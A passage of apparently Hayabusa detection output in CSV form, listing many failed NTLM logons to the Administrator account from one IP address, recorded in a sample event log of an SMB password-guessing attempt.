NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0qklApBFOMxVzucD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0IJSphtLB3eNARBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PLOFe4w5KpJ2UaGM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cF3JTWkGadY1fJE2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kyTH0jxSZB2YVdhW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NRq5XrcDkFvabCzh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.750 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zlYwlgrsMy1kSgEC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AchwW4ifbZ41AQNg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1PaxF7Q8ue1Kex1h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WAhW2PErXdwNVrx5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.943 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LoAV3ESqieev2JMC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wFlWFijaFirgsAtJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hSDjuqvzKLaWCWVo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SL0CVu787iFRLiPU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZQDORN33izpv4tGO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v470yorD43fgGyjC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LBbLWVZFDqFxb7dW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RJsowt9MrhXciLOZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uhCVFyMmDI5shASV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yd4SM9EGM7cnO6Z5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.490 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PSR1tbtzdDaJDbXs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rNqyjBuN0Pq6WRO1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vqpMAmE9OvHbFCh2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JfLQAaB0DPvxWQMB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A0kvHMwnj2k0HMLQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kPqfVDftcR4iRDaw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1bltwm2g13InAJM6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J2iFr8ppe5NzukXF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7EEUOBohBFRze6hL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NCOFn3WM71KmaZyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UdUkBxB1auduRfdS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E2JaWoYK56HRGfW1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.015 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a3JTCX9NIOpg6TFB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zFGkdUVAdKcrrREB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7oZW00FpKema01Vw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p4HbNQx0Acf83b1h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9aM5UCQbOLvcpI0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BGGChEAIdej9lBhr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4CaFYB1ImWAWbH0W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OLa3lkxWiJ00raQh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vMzyi0jIVLNrodC8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n2repX0roAP2j0TI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gqcpIjdkNpmoTe4A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Edgo9UdNvmMJpiyn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LpqOTu7Xn7ULipmN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.567 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TP0efL79STMbuu9g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HkwWfRi0E5sVY6UT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IkyCe9NXGExCQS5r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IGnhRwa7P7by9vJO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fh7IGliNbSyKwxpM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.782 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1QfgWsAqSYQfB9l5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q8VM66P8Vluf7yrL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cdYiwh3QjdA0Zoge : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ou3FPUI5bFcUvuFC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bMUg8N7apFtUgX9d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.991 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U7Cn4n7jQAQaxP6y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: urflPvd1vgYYi2ra : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pqFtTDD69fNTKROG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: teUZYpNyqJ64Dgcz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9kaKSy3DV5fRKvTc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gtiZUzpwrnuWIjna : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SD9UhsShNJRp251r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C5xbL7aO0azgBxfz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xqrUpW8PpI9RAeGk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M80K04eYwfwdzIul : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jcWY7cNeCNgJ3Czr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1OA561UrTkFnbEj3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iDnu1G7jmwLoXGLF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e2v70poTOKPUNZJo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhzoOmgTrdvTS27z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pyvmBFGhKFgvzM9S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qHC0keHW2YsKeP02 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 29vkwuFa6njYc86s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s9687XPVHFiwttdm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AcNGaeTqTydGinJE : IP Address: 192.168.198.149 : AuthPackage: 